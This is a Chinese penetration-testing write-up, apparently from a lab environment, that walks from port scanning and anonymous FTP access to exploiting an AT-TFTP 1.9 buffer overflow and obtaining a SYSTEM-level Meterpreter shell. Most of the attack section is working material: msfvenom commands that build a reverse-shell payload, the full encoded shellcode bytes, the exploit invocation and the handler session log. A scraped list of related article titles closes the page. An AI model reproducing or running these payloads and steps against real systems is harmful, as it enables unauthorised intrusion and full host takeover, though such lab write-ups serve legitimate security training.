0x00 前言

今天这篇文章主要来分享一个在渗透测试过程中如何通过逐步收集信息并最终拿下目标主机的案例。

0x01 案例分析

实验环境:

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux(10.11.0.74)

渗透过程:

首先进行服务和端口扫描,如下:

# nmap -sT -Pn 10.11.1.226Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:35 CST
Nmap scan report for 10.11.1.226
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE
21/tcp   open   ftp
3389/tcp closed ms-wbt-serverNmap done: 1 IP address (1 host up) scanned in 35.58 seconds

可见,目标主机开启了ftp和RDP服务。简单测试一下发现,ftp可以匿名登录。

# ftp 10.11.1.226
Connected to 10.11.1.226.
220-exploitme
220 Please enter your name:
Name (10.11.1.226:root): anonymous
331 User name okay, Need password.
Password:
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (468 bytes).
-rwxrw-rw- 1 root  root        0 Dec 24  2009 AUTOEXEC.BAT
-rwxrw-rw- 1 root  root        0 Dec 24  2009 CONFIG.SYS
drwxrw-rw- 1 root  root        0 Sep 19  2011 Documents and Settings
drwxrw-rw- 1 root  root        0 Dec 24  2009 ftproot
drwxrw-rw- 1 root  root        0 Dec 27  2012 Program Files
drwxrw-rw- 1 root  root        0 Jun 16  2016 Python26
drwxrw-rw- 1 root  root        0 Apr 20  2016 WINDOWS
drwxrw-rw- 1 root  root        0 Dec 24  2009 wmpub
226 Transfer successful.
ftp> cd "Documents and Settings"
250 "/Documents and Settings" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (108 bytes).
drwxrw-rw- 1 root  root        0 Dec 24  2009 All Users
drwxrw-rw- 1 root  root        0 Aug 18  2015 joe
226 Transfer successful.
ftp> cd joe
250 "/Documents and Settings/joe" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (401 bytes).
drwxrw-rw- 1 root  root        0 Aug 18  2015 .idlerc
drwxrw-rw- 1 root  root        0 Dec 24  2009 Cookies
drwxrw-rw- 1 root  root        0 Aug 18  2015 Desktop
drwxrw-rw- 1 root  root        0 Sep 19  2011 Favorites
drwxrw-rw- 1 root  root        0 Sep 19  2011 My Documents
drwxrw-rw- 1 root  root        0 Dec 23  2009 Start Menu
-rwxrw-rw- 1 root  root        0 Dec 23  2009 Sti_Trace.log
226 Transfer successful.
ftp> cd Desktop
250 "/Documents and Settings/joe/Desktop" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (130 bytes).
-rwxrw-rw- 1 root  root      694 Dec 24  2009 GuildFTPd FTP Deamon.lnk
-rwxrw-rw- 1 root  root     2417 Dec  8  2015 servers.py
226 Transfer successful.
ftp> cat servers.py
?Invalid command
ftp> type servers.py
servers.py: unknown mode
ftp> get servers.py
local: servers.py remote: servers.py
200 PORT command successful.
150 Opening binary mode data connection for /Documents and Settings/joe/Desktop/servers.py (2417 bytes).
226 Transfer complete. 2417 bytes in 1 sec. (2.42 Kb/s).
2417 bytes received in 0.01 secs (413.8064 kB/s)
ftp>

在ftp的目录里发现了一个有趣的文件“servers.py”,因此下载并查看此文件。

# cat servers.py
import wmi, time, ftplib, tftpyprint "[*] Start"
print ""def isFTPworking():print "[*] Checking FTP connection..."try:ftp = ftplib.FTP('10.11.1.226', timeout=5)ftp.login()except:print "[!] FTP not working!!"return Falseprint "[*] FTP is working."return Truedef isTFTPworking():print "[*] Checking TFTP connection..."try:tftp = tftpy.TftpClient('10.11.1.226', 69)tftp.download("C:/windows/temp/test.txt","C:/windows/temp/test2.txt")except:print "[!] TFTP not working!!"return Falseprint "[*] TFTP is working."return Truedef killProcess(processname):print "[*] Killing process: " + processnametry:c = wmi.WMI()for process in c.Win32_Process():if process.Name == processname:process.Terminate()except:print "[!] Exception while killing process"return Truedef startProcess(processpath):print "[*] Creating process: " + processpathtry:c = wmi.WMI()pid, result = c.Win32_Process.Create(processpath)except IOError:print "[*] Exception while creating process " + processpathreturndef isProcessAlive(processname):print "[*] Checking process: " + processnamecheck = Falsetry:c = wmi.WMI()for process in c.Win32_Process():if process.Name == processname:check = Trueif not check:return Falseexcept:print "[!] Exception while using wmi interface"return Trueif __name__ == '__main__':ftpproc   = 'GuildFTPd.exe'tftpproc  = 'tftpd.exe'processes = {'GuildFTPd.exe': r'"C:\\Program Files\\GuildFTPd\\GuildFTPd.exe"','tftpd.exe': r'"C:\\Program Files\\Allied Telesyn\\AT-TFTP Server 1.9\\tftpd.exe"'}while True:for processname in processes.keys():if not isProcessAlive(processname):startProcess(processes[processname])if not isFTPworking():killProcess(ftpproc)time.sleep(5)startProcess(processes[ftpproc])if not isTFTPworking():killProcess(tftpproc)time.sleep(5)startProcess(processes[tftpproc])time.sleep(30)

很显然,这是一个用来启动ftp和tftp服务的python脚本。回想起前面我们的扫描结果显示目标主机确实开启了ftp服务,于是猜想可能就是和该脚本有关。从上面的代码可以判断,目标主机安装了AT-TFTP server 1.9。扫描TFTP的端口69(UDP)发现确实是开放的。

# nmap -sU -Pn -p 69 10.11.1.226Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:44 CST
Nmap scan report for 10.11.1.226
Host is up (0.12s latency).PORT   STATE SERVICE
69/udp open  tftp
MAC Address: 00:50:56:89:7B:69 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds

Google搜索发现AT-TFTP 1.9存在一个缓冲区溢出的RCE漏洞:<https://github.com/brianwrf/cve-2006-6184&gt;

于是,利用下面的步骤生成meterpreter的反弹shell的shellcode,并替换利用脚本atftp.py中相应的shellcode代码:

# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.74 LPORT=4444 R > payload
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 177 bytes
# cat stackadj payload > shellcode
# cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 210 (iteration=0)
x86/shikata_ga_nai chosen with final size 210
Payload size: 210 bytes
Final size of python file: 1020 bytes
buf =  ""
buf += "\xdd\xc1\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x2e\xbf\x13"
buf += "\x73\xb1\x20\x31\x78\x1a\x03\x78\x1a\x83\xe8\xfc\xe2"
buf += "\xe6\xf2\x5d\x8c\x05\xf5\x9d\x31\x7f\x1e\xda\x21\x86"
buf += "\x1f\x1a\x4e\x18\xd1\x3e\x3a\xa5\x2d\x4a\x41\x68\x36"
buf += "\x4d\x55\x19\x91\x6d\xa8\xf7\x95\x5a\x30\x06\x44\x93"
buf += "\x84\x91\x34\x15\xce\xac\x45\x54\x4b\x6e\x30\xae\x17"
buf += "\x08\x82\x84\xed\x37\xbf\x93\x41\x93\x41\x4d\x3b\x50"
buf += "\x5d\xd4\x4f\x29\x42\xe7\xa6\xb6\x56\x7e\xb1\xd4\x82"
buf += "\x9c\xa3\xdb\x2b\xad\xf8\x47\x27\x8d\xce\x0c\x77\x1e"
buf += "\xa4\x62\x64\xb3\x31\xea\x9c\x95\x23\xb9\xfa\x41\x9f"
buf += "\x0f\x6b\xe5\xac\x5d\x34\x5d\x35\x18\xb8\x3d\x46\x8c"
buf += "\xa8\xed\xeb\x63\x80\x52\x5f\xc0\x75\xdc\xb8\xa0\xf8"
buf += "\x31\x4e\x2e\xac\x9e\x29\x97\xb5\xfe\x49\x31\x5f\xb8"
buf += "\x1e\xd2\x5f\x6c\xc9\x44\xaa\x9a\xf6\xde\xcc\xf4\xe7"
buf += "\x82\x76\x56\x81\xd9\x1d\x48\xc2\x4a\x84\xd1\xb3\x71"
buf += "\xb7\xf4\x6c\xcd\x4b\xa9\xdf\x7a\x07\x2f\x59\x44\x9f"
buf += "\x50\x7f"

开启MSF的监听,并执行利用脚本。

# python atftp.py 10.11.1.226 69 10.11.0.74 9

接着,我们成功地获得了一个meterpreter的反弹shell,如下:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_nonx_tcp
payload => windows/meterpreter/reverse_nonx_tcp
msf exploit(handler) > set LHOST 10.11.0.74
LHOST => 10.11.0.74
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.[*] Started reverse TCP handler on 10.11.0.74:4444
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (171583 bytes) to 10.11.1.226
[*] Meterpreter session 1 opened (10.11.0.74:4444 -> 10.11.1.226:1144) at 2017-09-10 03:57:12 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryptionmsf exploit(handler) > sessions Active sessions
===============Id  Type                     Information    Connection--  ----                     -----------    ----------1   meterpreter x86/windows  JOE\joe @ JOE  10.11.0.74:4444 -> 10.11.1.226:1144 (10.11.1.226)

迁移当前的meterpreter(PID 3716)至一个稳定的进程vmtoolsd.exe(PID 1776), 然后执行getsystem命令进行提权。最终,我们成功地获得了一个SYSTEM权限的meterpreter反弹shell。

0x02 小结

总结一下该案例的渗透思路如下:

  • 首先进行服务和端口扫描
  • 接着检测到ftp可匿名登录并进一步发现有价值的脚本文件
  • 猜测并验证目标系统开启了有漏洞的tftp服务
  • 修改漏洞利用代码并尝试利用
  • 最终获得反弹shell并成功提权

渗透测试学习笔记之案例五相关推荐

  1. 渗透测试学习笔记之案例二

    0x00 前言 渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限.在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到 ...

  2. 【Linux_Kali网络渗透测试学习笔记总结(五)】社会工程学攻击

    网络渗透测试(五):社会工程学攻击 社会工程学时利用人性弱点体察,获取有价值信息的实践方法,它是一种欺骗的艺术.在缺少目标系统的必要信息时,社会工程学技术是渗透测试人员获取信息的至关重要的手段.对所有 ...

  3. KALI LINUX渗透测试学习笔记

    KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...

  4. kali linux 渗透测试学习笔记——被动信息收集

    kali linux 渗透测试学习笔记--linux 被动信息收集 被动信息收集 被动信息收集 公开渠道可获得的信息 已公开的信息,通过互联网等渠道去获得 与目标系统不产生直接交互 不对目标访问,扫描 ...

  5. Web渗透测试学习笔记

    文章目录 第一章 信息收集 1.1域名信息 1.1.1whois查询 1.1.2备案信息查询 1.2敏感信息 1.3子域名信息 1.3.1 子域名检测工具 1.3.2搜索引擎枚举 1.3.3第三方聚合 ...

  6. 渗透测试学习笔记20.11.20

    目录 杂项 Kali linux Metasploitable2 (Linux) POC.EXP.Payload与Shellcode dvwa Apache cdn如何防止DDOS攻击 Kali抓包破 ...

  7. 渗透测试 学习笔记 思维导图

    资源简介 此资源为本人自学渗透测试过程中做的一些笔记,为思维导图模式,用XMind ZEN 可打开,主要涉及到渗透测试的基本步骤,所用到的工具和渗透方法,ruby语言的简单学习,近源渗透测试的详细学习 ...

  8. 渗透测试学习笔记_Day1

    拓展知识 APT (Advanced Package Tool,高级软件包工具)是一个打包管理 系统.APT允许使用命令行的方式,快速便捷地安装.更新.删除软件. 除了茴单以外,APT最大的优势是它可 ...

  9. 渗透测试学习笔记(metasploit)

    METASPLOIT exploit-db.com •Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最 ...

最新文章

  1. [转] createObjectURL方法 实现本地图片预览
  2. 计算机组成原lta,计算机组成原理实验三运算器
  3. Android 使用Adapter适配器模式实现无线轮播BannerView
  4. 8影像计算ndvi landsat_使用GDAL读取遥感影像的信息
  5. 人工智障学习笔记——机器学习(5)朴素贝叶斯
  6. axure插件怎么用_CAD插件不会用怎么行?CAD插件大全合集,超实用绘图软件,高效...
  7. CCF201312试题
  8. Map集合框架的练习
  9. 听鬼哥说虐心的2048简化过程
  10. python 简单 socket 编程
  11. win11安装texlive 2021版本
  12. java用户登录进入系统_Java CRM系统用户登录功能实现代码实例
  13. Windows10安装报错 由于存在受损的安装文件
  14. WPF Deactivated和Activated简单使用
  15. 添加或修改Kindle图书封面
  16. 高配云计算机平台,云电脑真的来了!小破本也能秒变高配
  17. 幼儿抽象逻辑思维举例_【干货】教师资格《幼儿保教知识与能力》重点归纳一...
  18. 基于Spring Boot应用Apache CXF发布Web Services服务
  19. 雷建平:我亲历的中概股上市潮
  20. 纯干货分享,新手小白如何精细化运营,玩转抖音小店无货源店群?

热门文章

  1. HBuilderX的介绍与语法提示
  2. 单元测试报connection is allready closed导致dailybuild中断的解决方案——类加载机制的应用...
  3. 【未知攻焉知防】如何利用旁注渗透入侵服务器站点
  4. 湖南大学基于SMTP和POP3的邮件系统——计算机网络课设
  5. 甲基化芯片入门学习-基础知识(一)
  6. 使用2节点梁或梁/杆单元分析弹塑性梁或框架(python,有限元)
  7. Kibana原型污染导致远程执行代码 CVE-2019-7609 漏洞复现
  8. h3c r4900服务器系统安装,H3C R4900 G3安装CentOS 6.7网卡配置方法
  9. “假离婚、真套现” 解禁潮将至 拉卡拉上演“一出好戏”
  10. OpenCV通过HSV颜色空间过滤图片及目标检测颜色空间范围确定